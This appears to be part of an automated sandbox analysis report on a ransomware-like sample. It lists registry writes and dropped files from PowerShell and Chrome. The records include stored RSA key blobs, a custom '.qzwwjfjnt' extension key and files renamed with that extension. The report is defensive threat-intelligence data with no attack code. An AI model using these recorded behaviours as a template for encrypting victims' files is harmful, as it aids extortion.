HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
256
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
256
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
256
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
256
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
256
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
256
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
256
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
256
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
256
powershell.exe
write
HKEY_CURRENT_USER\Software\ex_data\data
ext
2E0071007A00770077006A0066006A006E0074000000
256
powershell.exe
write
HKEY_CURRENT_USER\Software\keys_data\data
public
0602000000A400005253413100080000010001000DC27CEC5FB16A4B3C5E31F0A8D9F8FA80DF422EEC3EA1231EFB76195E393E37212CA77706E5A62B91B4475B6B11AA6E27832E145ED6BDB5479525D2AD0245E06FBE7049C4543F94962761E20540CBE95A6E9BB1298DF83D183DCACA07003CBCCCDD4A4BE7843644C53861F305357E90303F00126FEC488191070D5964436AFE293B0AAC4232F0744207F37FA23201E449B1168B3588CC101E8EE50098A8C46A9BF264DE29200D201A9E17216AB2F4A5D4576A735920D3D7297033C37E0EA05A334EA7A7BF467FC673821AD840D8D5B4BD639BE22C2E3440C23D057BA8AE6BBCE169C9BB2627782CB6D7456AF3947922B82C2B1BEF7652F1D28589BCD2A824C8
256
powershell.exe
write
HKEY_CURRENT_USER\Software\keys_data\data
private
94040000CB0481A2DA188D89F12F9592DFD67EE7A85586006D58F0A9C11A8267F4BEEFAEBF2DBDBCDF4719FA3109D3FF9BA4483783885C4A448A74927FBFAEEB1B49DD174D7A1B7F95EC0593BC77A53392651C5D2F7107D3FB482D79B73619E0B61E3E02EDCDBAA3F115C36DA181C699504DA256C46FA3DE2A91C4886587693D2C0BF9B8321572C2BC6BD7E9283E43D3ECE63B5A9B3063A89239A62DC0CA5D93BC70E312F3EC475AA6E6634661426553BC9D65B1FD514EB6E7ADE5E2F436CC1E5AF478688BB6402BA573FEAE59AD1A60DBAB77505C372A5B4D4EF999E91CE50DFA048CFA140143FCF0915A84A98B97CDF297332D84ECD2521EA893B16C0825E6740F763573B8397BF5441A156D4124C3C01C249A6AD73625CF15D51FB7821A4EF3FD17EE285888385DCE8FC1593C865CF869F06A23263A00CC24676D5E6EB3F58EAB14CB9DA202EC3A2F2F6D0A15CAA58AFDA571627A98158FDB586543C67962A26D81D7CAFDC7BF88B87042F20ADB92E415BDC28802C927964A66A870759923C27F4127D904544527E510AF7710CC907F8633DC69760840D8A42A1E1BA1FAD1AB3815C9C9D3F6DA1E86B9E694F69D601DD91BC35BF28B2C9EAEECE55041D24FBB81F51BF0C27198CF4FF6F2D921CD670F9D727C817EFFCBF6EE4E9AE43543EA5782153D4FD06DB9CEA9FB303554175B50CDAC743A471930FB3C745F72E5DB1AA37782286ADF9696E0DA644BB18FAA2B0ABB6F8BF8988A3FDCB3C8CDD77C9ACC60462FE8ED694FE4D41A9D58DFBF7674F3FE5C7022159974BC148DD3CB15FD5908756B5C3D2FCA26EFDC17FBF53A506957D71651C898F017F7743204CE391A74664A61AF8E32C61A31C92C8F4627DE69BEC378DC458A407E4112E16DEF7EE1DC79987DB1ADE8C5F2F939312714ACFA4B6DC47D727C3FDFB2BEAEB4191545A6B575653566B9843ED893A5E5757AB2B6E0BC00C11447E366FF1956171A74826C61B60D843432BAB0480A9ED5AC9251C5D50A02D960860948B1F9D9DF733DDDB4B2A7265E5438D7321BB8999DB07F2621C74B7D56A3B0E766939D13DCB10D7BF66D7118BDC2F097429DF4902F65FF6A3EEA0C3F51E87F2C51700AFCEC62E8B60B7C72ACC3D87E62EEB2E0E3A71E723397F08DA3CC25FAA93E773E79D4BE7CD83C5A3619569B4BEDC8A30D80B11DB3A7EA6D238D6AE5E7D9F3AC50A87C1DEB2CAF7FF99DBF5F1077364D01D17E998F9B368CE0A9A33652B1DA468CC03BE29182B24D4E973F7CEBCDBF57C9196459ACB6D972AD8F9ED6C1E8906C9653151E7FFC650C09F542B4673047DCB700D9BD4937AFE39785651295C15F9C0C8DE4BAE0DAA76DA34854F120B42A9252C5F871343B06616F8BDE636996A411AC0A643CD53037057B001794CB642D459F545254D8918346839D5779606799BAA83C0BF42554996C704E623708004FAFE732513043D437A06D3092850CC688B4DE04AF4C410B2244BC7E3D63C68BABA4EB5878F779D87F77F53094876CDEDA965EFF1EF08FA606ACEB75B6F267F869867E15ADB478925586B3CB24CE03C0A9B4BC5006FACAEFE80187CACF6032BBF5ADED2DAA3FD0A35DF90635F7C2D51AB5C1C0E54FE2350D923DAFFFA34174F583104E6E5129FFF814CEE03D9C5B137FE62C928A9ABFA4B5099DE3465D5E2A4991648F793C44EEC0637A99C9468B663D6E0598E4B52FCA2A34A8DB1EC429ED3F8C93A1D2DC8E40BF7DF04BD3AC9EAE17C2CF86D8D02B92D321F2348C46D1CD0227356A3BCB1BA03986A414ADC3CDB31D34F3936F3AD24276BABC0911244F526EE576C3937D1A6D43B8996E91D8F01B0C8604DB37D371630DCAB3BFC2A477C6BE91D324733357019DDB0D78530F55E065E3290966BE3FFF29F4131EA0C00196058CC766F6D75A471F2E11179802B7B5F484613E9E43A1FD33078F6F535BB3E09ED7BB0F161CA9DEEB33873B914AA70A74DAD9D1A076EA0CF4F94A3BC3B8463365A9A947B65D9BB2740CB733BF88A38C7BA3DD017E6534549CC34DDB6EDE0EBA52B5ED3BD08169DE9EB6B9EC5A2973F8FA1461FD8D294BD9ECFF3745D4C4E7D5AB87EED2AC5C3E32B3F4947BC96F007DF59FF4D3FEA09562E15A8C26DB13850026A384318F5F1839CC85FF6B036DCAC0B67DCA6864C6E8301B3B9BC3DB58BBFCE4D71CF019DCF5481AC725E91055AFE990B7BDE69792A98B1C2190847DFC502A6752A24B23DA9EE98BF0790D6F2C64EE24E5130128620CC0E7565AD159360F0054EFF9CEEE7A3B59955B5C550E8EA4F49DD1AF6A872519D9AB79B0038EB9A669BF9C0632D4CE30EC5F155F421A1A330BB3BE5D709398BBCF6FEEFB96B412F53A3B0D504F70461098B41601EB1D0D6CFE393027
256
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
256
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
256
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
256
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000069000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
2792
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
failed_count
0
2792
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
state
2
2792
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
state
1
2792
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
dr
1
2792
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome
UsageStatsInSample
0
2792
chrome.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}
usagestats
0
2792
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
metricsid
2792
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
metricsid_installdate
0
2792
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
metricsid_enableddate
0
2792
chrome.exe
delete key
HKEY_CURRENT_USER\Software\Google\Chrome\BrowserExitCodes
2792
chrome.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\_NumAccounts
aggregate
sum()
2792
chrome.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\_NumAccounts
S-1-5-21-1302019708-1500728564-335382590-1000
1
2792
chrome.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\_NumSignedIn
aggregate
sum()
2792
chrome.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\_NumSignedIn
S-1-5-21-1302019708-1500728564-335382590-1000
0
2792
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\StabilityMetrics
user_experience_metrics.stability.exited_cleanly
0
2792
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
lastrun
13186143152877250
2792
chrome.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
3568
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BrowserExitCodes
2792-13186143152205375
259
2020
chrome.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US

Files activity

Executable files
0
Suspicious files
343
Text files
291
Unknown types
4

Dropped files

PID
Process
Filename
Type
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences~RF602111.TMP
text
MD5: 199d6696217cfca03023608d1ab6d072
SHA256: 4a8f48c9876317472abbbbe3c740f9971d5ca785774f83f3aaff78af3646c936
256
powershell.exe
C:\Users\admin\AppData\Roaming\Notepad++\themes\Hello Kitty.xml.qzwwjfjnt
binary
MD5: c59407d0feddd511d506dbdd83eab509
SHA256: aa48dae519b8b74beb509166762f797cc97ca5a3d43f236b490d372d3527dce7
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\2998bdc0-8ac7-472b-9216-1e3c7824ef3b.tmp
––
MD5:  ––
SHA256:  ––
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity~RF601b07.TMP
text
MD5: c0510b40cab772cda6fb5e651b455c18
SHA256: 6dfa681913e55ee92c0fec2efc412acaa5872570ecbfd10139f2331b2604dafa
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity
text
MD5: c0510b40cab772cda6fb5e651b455c18
SHA256: 6dfa681913e55ee92c0fec2efc412acaa5872570ecbfd10139f2331b2604dafa
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\3aa4b967-1bb6-487f-b6dc-10d32b2553d3.tmp
––
MD5:  ––
SHA256:  ––
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State
text
MD5: c05d737e66c0e4bd506ca37bced47535
SHA256: 1ce6aa8f59d89a0ca9686e08192e382ebcbe1fc81d0185029f41225137bd9609
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State~RF601aa9.TMP
text
MD5: c05d737e66c0e4bd506ca37bced47535
SHA256: 1ce6aa8f59d89a0ca9686e08192e382ebcbe1fc81d0185029f41225137bd9609
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\7deaf6b4-cc5a-4e8b-a5de-d6b73f01b874.tmp
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: d53f9e864b01ab5cd52a657fd5af4914
SHA256: f224cc86c9280be890fcac0ddc90e031b0f5105735864d59733feb01d26d785b
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000023
image
MD5: 8498a813da225bfe690197df98ac960f
SHA256: 6e56f6a1174244761c0d41ddb976a2771a261ffc6d39b4fd51999bb4e9007dd3
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
binary
MD5: 8763c3c2769de5da7876faffe9173089
SHA256: 0f064d133808530a5664d877ffdf5efd5149cf8476d05d0a6a7cd09644d2fa11
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF600126.TMP
binary
MD5: 8763c3c2769de5da7876faffe9173089
SHA256: 0f064d133808530a5664d877ffdf5efd5149cf8476d05d0a6a7cd09644d2fa11
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 5e26ccbc1b07b9a27003abe0a925a513
SHA256: 7980f0fa2b204c7ccfc82585fc8986e06e4768667bc8d5e039cf227f6273873b
256
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
––
MD5:  ––
SHA256:  ––
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000022
compressed
MD5: 35af0198c2b934e14d29a4fea590dea8
SHA256: 6b942e2169b2a8e7b13217dbebff4b5b5670ecf9c5d405bbe000aa5033ac5ddd
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000021
html
MD5: 5948b37af7cea16ca56215208b55917a
SHA256: 9a0dd3893be4353733966562440d466c5824817488f407764e7d77bee3911221
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001f
compressed
MD5: a8c76a27d1de3f2d1bc4dc2f77d25b0a
SHA256: 8c81fab92d778a009a83a9abde61182b82c946533f46916b7afde508ce29bccb
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000020
text
MD5: 39c56015ba6186ba344db15a51e6a57b
SHA256: 8febeb9b35d0161d9ea6fd2fc15a770b0fe4f24b2d57076bea6da25325be88ba
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001e
compressed
MD5: 3da2b4a8893eff0a09733888ffab43a1
SHA256: c120ee81362ed0e4730c1de3f98f9bb596430780fe23301f47621aa9c3afba9a
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001d
compressed
MD5: 914676df3e687523d23cf4f91868e3af
SHA256: 09a827ec2959ea2b4fe00cff593c0fa39e5a03eedf36f3b9fd9915dbb925e135
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
text
MD5: 5f910f89c0fcf13165185a62a2055595
SHA256: 643853828a43c0041afface49f7210bb516154f69634abcef46398d6f0495f4c
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences~RF5ff9f2.TMP
text
MD5: 5f910f89c0fcf13165185a62a2055595
SHA256: 643853828a43c0041afface49f7210bb516154f69634abcef46398d6f0495f4c
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\41604964-b175-43d5-8a26-be6ef22fe453.tmp
––
MD5:  ––
SHA256:  ––
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001c
compressed
MD5: 01d5892e6e243b52998310c2925b9f3a
SHA256: 7e90efb4620a78e8869796d256bcddbde90b853c8c15c5cc116cb11d3d17bc4d
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001b
image
MD5: 345883366c0cef4c0016babdea20cd54
SHA256: b666ea2fb805733dcbb3fcd8343bc21c961bbfa56bd8880ad829ed58bbb2063c
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00001a
image
MD5: 0e014aa010d4d456077a996fad204cf5
SHA256: 3e2784c45ca959cbfc1f1d8466f2fdb09eb3db18e1a506abb6d16998a7bcaf1e
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000019
image
MD5: 3eac4ef5e6481f5b32ea41a33e9d972d
SHA256: ab413587129dd4151018ac44aabf544473bf3cadbda9a2f4859c92a7df28a9a0
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000018
compressed
MD5: 36a35496107d5d04f2c859f9e3c3c4f9
SHA256: 6828977977a67215511d757a4ec21f23ab4449272b9abcc9a8b2776c7125479c
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000017
compressed
MD5: 252047cc64c4b1980fafe6abca669f06
SHA256: 1045d98023671ce42bbcb900f609fe49c335479963cdfab1f1824f1db18892dc
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000016
compressed
MD5: 79c26a3bec8c8195107cb0e69f211ea6
SHA256: 729259be1acde44ee426a5c1acde0512b16e534fdecfb022feebc7334c969029
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity~RF5ff186.TMP
text
MD5: 4a153fcc0276766ead4d122bbdd86fc3
SHA256: 29750bec6ad1841a4b68d7c5729c5ce0912146dbfa2f2572821535a06a9939a9
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity
text
MD5: 4a153fcc0276766ead4d122bbdd86fc3
SHA256: 29750bec6ad1841a4b68d7c5729c5ce0912146dbfa2f2572821535a06a9939a9
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\3b6e713b-e5e7-4191-b6dd-5e98c947ae50.tmp
––
MD5:  ––
SHA256:  ––
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State
text
MD5: c9958704b693d9777afc467aacade0ce
SHA256: 95fedcb502d5026ab93cc35c26cfd5c1e8f37cd2139f602fe40ed63ee36e540e
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State~RF5fefff.TMP
text
MD5: c9958704b693d9777afc467aacade0ce
SHA256: 95fedcb502d5026ab93cc35c26cfd5c1e8f37cd2139f602fe40ed63ee36e540e
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\75b830b7-b7ad-45cd-b42a-971abd1c736d.tmp
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: 2ba2d52e8337b90d3afd7403ce854ec3
SHA256: 3103b7c9db2fd6ea51b7ece83429b9c6bac0de96ad1d8cee115f2f927eb9ca69
256
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: 844627a614746ebcbda52fd19e177cc0
SHA256: 8980013f453255cb020ffcfb5dfcbc68be0bf42e688601c8ae2358a0cac0c79a
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\0d9a7fce-f7ba-4f72-9b38-6cfc7ff1922f\index-dir\the-real-index
binary
MD5: aa091c8c2b4e473591a3b991af6213c9
SHA256: d7384e6f7c34a37fc621c5dadb6b062cd0cfe6bd58d7d304583ce1ec8cc03e07
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\0d9a7fce-f7ba-4f72-9b38-6cfc7ff1922f\index-dir\the-real-index~RF5fd2c3.TMP
binary
MD5: aa091c8c2b4e473591a3b991af6213c9
SHA256: d7384e6f7c34a37fc621c5dadb6b062cd0cfe6bd58d7d304583ce1ec8cc03e07
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\0d9a7fce-f7ba-4f72-9b38-6cfc7ff1922f\index-dir\temp-index
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: c10745438309dd8a003bf36fdb51c651
SHA256: 351011a3ef71e1bd3c925a9d0fec6351823549a458cf8419ad7a04c6e3db8373
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000015
compressed
MD5: c42128f2d249ab4f921112e47104a06a
SHA256: abf1578241c9a2cd39e4aacdaeaf09f18494549c33255ba0ae2f3c3045dde2c1
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000014
compressed
MD5: 95314693806514bda465c9862754373b
SHA256: 9e470adeea64a44c5892444e3c590e6c18fd2fff052778eaf86f1537813001c5
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000013
compressed
MD5: a1212780625817bc6893b78aca9cdc84
SHA256: 2ee825188e274099affc08e8f8de0fc094235cd7ad95a50abe9a74d3f6a68ca6
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000012
binary
MD5: aa96776b2bbf15a3c227d0bd2c8fdc2d
SHA256: 5eba4991e6d9e6e87b1c2fa81b38899087dd0575713e8274d4f2cc3ae7370b19
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000011
image
MD5: fee6bcb494ab0b0b26f6d27b1eb1e1bb
SHA256: db2dc0c2c1de04d7225f5f9eedc85f9da9778805ded39c98b90a1fe211a5ce61
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity
text
MD5: 7f89ed850dfac810b46dd85f67cd54ec
SHA256: 9faedbb59012fe5de199d8add0b9c69c38b8b338cb07dd9a6150cd8fc8795c76
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity~RF5fc9ca.TMP
text
MD5: 7f89ed850dfac810b46dd85f67cd54ec
SHA256: 9faedbb59012fe5de199d8add0b9c69c38b8b338cb07dd9a6150cd8fc8795c76
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\bdbf72a3-6910-43a2-84bb-1f4d15e06ae1.tmp
––
MD5:  ––
SHA256:  ––
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences~RF5fc97c.TMP
text
MD5: af8f1e30e353ce56c4fcb0a8bdccd3a0
SHA256: b8f590d79c28ef909b409b25f515f1a739f04d4f0930bc21b7d7f79bc7ee5863
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
text
MD5: af8f1e30e353ce56c4fcb0a8bdccd3a0
SHA256: b8f590d79c28ef909b409b25f515f1a739f04d4f0930bc21b7d7f79bc7ee5863
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\9f4b1d02-2126-4f2a-8e35-e3cc8fbd43c7.tmp
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
binary
MD5: 5c4a4acb36087402d89200f77077c95f
SHA256: 3ffcd4463abb2d678162a64c2ce6f04a048bb424dee8d9c7078388af52fef41c
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG
text
MD5: 334cc53c75ff52f90395036eea62c274
SHA256: ee267d4bedd4ed0ff7c778df3a1b530fbe7476cd2a0655b7c4034b852374d19f
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\000003.log
binary
MD5: 021b8d293c14358bb37b18ba45792aa5
SHA256: 5b149d68659ebeab90f1116b8704a32dc240fbf85171bd4a4f70d57a3d8d4bb8
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG.old
text
MD5: 8ddcd8b46559486c5c65d91b1964f9b1
SHA256: 30953aa5d4726c71b4e633a258e82d3979243f4597973adfbe45f005d79bcc8b
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG.old~RF5fc91e.TMP
text
MD5: 8ddcd8b46559486c5c65d91b1964f9b1
SHA256: 30953aa5d4726c71b4e633a258e82d3979243f4597973adfbe45f005d79bcc8b
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG.old
text
MD5: b36272766fafe4f495f275ab24d055a4
SHA256: c6ed4b87e6b46abc8f08c947e4c78f8d4416b35ab63980b8314794cc43d0c365
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG.old~RF5fc8ff.TMP
––
MD5:  ––
SHA256:  ––
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG.old
––
MD5:  ––
SHA256:  ––
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State
text
MD5: e50795110f926bae4bf2aad2b0c5604b
SHA256: 842bbea0840ac1cd88cdf7b420efd7eb8404cb6d75f8144385ba6608fdff2751
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State~RF5fc8df.TMP
text
MD5: e50795110f926bae4bf2aad2b0c5604b
SHA256: 842bbea0840ac1cd88cdf7b420efd7eb8404cb6d75f8144385ba6608fdff2751
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\e77ec3ea-0bd0-44f8-9695-4faa2698bec4.tmp
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\Local\Temp\CabC8C4.tmp
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\Local\Temp\TarC8D5.tmp
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
compressed
MD5: 2af3e4b57a8b637fcee8cb7485986fa3
SHA256: 10632f5e8df34d4641f11aa0ad917a629bf75f7c0eaa77506c5a27919e7b12aa
256
powershell.exe
C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
binary
MD5: ead74ee13542857f824ff7059391bc78
SHA256: 13624ac4c1c9823381473bd75457e974936d6d1d767fb7f35a8ef9944f84a1e0
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\index.txt~RF5fc7b6.TMP
binary
MD5: 39e27b40fe3f4db34ab2d2f1cf07953f
SHA256: 197e8b3a0147e6580fa2bb76ef024aa5da8a0e1c73806e7aecccc430bdd36178
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\index.txt.tmp
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\Local\Temp\TarC7B9.tmp
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\Local\Temp\CabC7B8.tmp
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\Local\Temp\TarC798.tmp
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\Local\Temp\CabC797.tmp
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 1755365ceb4605b9bdcca8479e88fefe
SHA256: 609b52dbd5b42c011d125d1af4d23f0d42ee4317c42f81df634c28433a664b90
2792
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\caecb3bd-7969-4305-84d6-3a376453ec73\index-dir\the-real-index
binary
